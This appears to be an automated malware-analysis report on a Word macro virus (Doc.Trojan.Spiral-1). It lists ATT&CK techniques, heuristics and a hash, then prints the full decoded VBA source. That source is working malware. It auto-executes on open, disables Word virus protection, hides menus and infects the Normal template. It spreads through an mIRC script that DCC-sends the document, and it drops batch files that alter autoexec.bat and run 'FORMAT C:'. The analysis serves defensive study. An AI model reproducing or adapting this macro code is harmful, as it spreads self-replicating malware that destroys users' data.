Verdict: MALICIOUS (Risk Score 340)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that are automatically executed upon opening (AutoOpen). These macros attempt to create a batch file named 'spiral.bat' in the Windows Startup folder, likely to establish persistence. The script also manipulates Microsoft Word's security settings by disabling virus protection and removing macro-related menu items, which is a common tactic to facilitate further malicious activity. The ClamAV detection of 'Doc.Trojan.Spiral-1' further supports the malicious nature of this document.
Heuristics (7)
- ClamAV: Doc.Trojan.Spiral-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Spiral-1
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4007 bytes |

SHA-256: 49ef6f5a9bbead025095dfbdd9cbbd236df10077ba2de742d50133ce9937d92d
Detection: ClamAV: Doc.Trojan.Spiral-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
'WM97.Class.Spiral.Trojan
'By a.v_killer
On Error Resume Next
CheckHostNormal = GetAttr(NormalTemplate.FullName)
If CheckHostNormal = vbReadOnly Or CheckHostNormal = vbReadOnly + vbArchive Then
Norm$ = NormalTemplate
AttribMe$ = "attrib -h -r "
GetTemplates1$ = "c:\progra~1\micros~1\templa~1\"
GetTemplates2$ = "c:\progra~1\micros~2\templa~1\"
Open "c:\WINDOWS\Start Menu\Programs\StartUp\spiral.bat" For Output As #1
Print #1, AttribMe$ + GetTemplates1$ + Norm$
Print #1, AttribMe$ + GetTemplates2$ + Norm$
Print #1, "del " + GetTemplates1$ + Norm$
Print #1, "del " + GetTemplates2$ + Norm$
Print #1, "del c:\windows\startm~1\programs\startup\spiral.bat"
Close #1
End If
Application.ShowVisualBasicEditor = False
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.EnableCancelKey = wdCancelDisabled
With Options
.ConfirmConversions = False
.SaveNormalPrompt = False
.VirusProtection = False
End With
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
SpiralHost = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Spiral = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set SpiralCode = ActiveDocument.VBProject.VBComponents.Item(1)
SpiralDoc = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set SpiralCode = NormalTemplate.VBProject.VBComponents.Item(1)
SpiralInfect = True
End If
If SpiralInfect = True Then
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\Spiral.sys"
SpiralCode.CodeModule.AddFromFile ("c:\Spiral.sys")
SpiralCode.CodeModule.Deletelines 1, 4
SpiralCode.CodeModule.Replaceline 1, "Sub AutoClose()"
ElseIf SpiralDoc = True Then
SpiralCode.CodeModule.AddFromFile ("c:\Spiral.sys")
SpiralCode.CodeModule.Deletelines 1, 4
End If
If Day(Now()) = Int(Rnd * 6) + 1 Then
dlg.Password = "a.v_killer"
Shell "C:\Spiral.COM"
End If
End Sub
Sub Mirc()
On Error Resume Next
SetAttr "C:\mirc\system\script.ini", vbReadOnly
Open "C:\mirc\system\script.ini" For Output As #1
Print #1, "[SCRIPT]"
Print #1, "n0=on 1:text: *:?:{ s *2 | halt }"
Print #1, "n1=alias /s / *1"
Print #1, "n2=on 1:connect:/.enable #d"
Print #1, "n3=#d off"
PRINT #1, "n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick "c:\windows\system\spiral.doc" } | .disable #d | .timer 1 60 .enable #d }"
Print #1, "n5=#d end"
Close #1
End Sub
Sub Playload()
SetAttr "C:\spiral.bat", vbReadOnly
Open "C:\spiral.bat" For Output As #2
Print #2, "@ECHO OFF"
Print #2, "del c:\win.bat"
Print #2, "ECHO attrib -h c:\win.bat >> c:\autoexec.bat"
Print #2, "ECHO C:\WIN.BAT >> c:\autoexec.bat"
Print #2, "ECHO REM InFecTeD bY ThE SpIrAl bat dropper ViRuS(c) >> c:\autoexec.bat"
Print #2, "ECHO REM PRAY 4 MERCY(c) >> c:\config.sys"
Print #2, "ECHO @ECHO ON >> C:\WIN.BAT"
Print #2, "ECHO I'M NOW TAKING CONTROL OF YOUR BOOT SECTOR HEHEHEHE! >> C:\WIN.BAT"
Print #2, "ECHO @ECHO OFF >> C:\WIN.BAT"
Print #2, "ECHO DEL C:\DOS\UN*.* >> C:\WIN.BAT"
Print #2, "ECHO FORMAT C: |Y >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\SCANNER >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\SPAMHEAD >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\A.V_KILLER >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\IS >> C:\WIN.BAT"
Print #2, "ECHO MKDIR C:\HERE >> C:\WIN.BAT"
Print #2, "attrib +h c:\win.bat"
Close #2
End Sub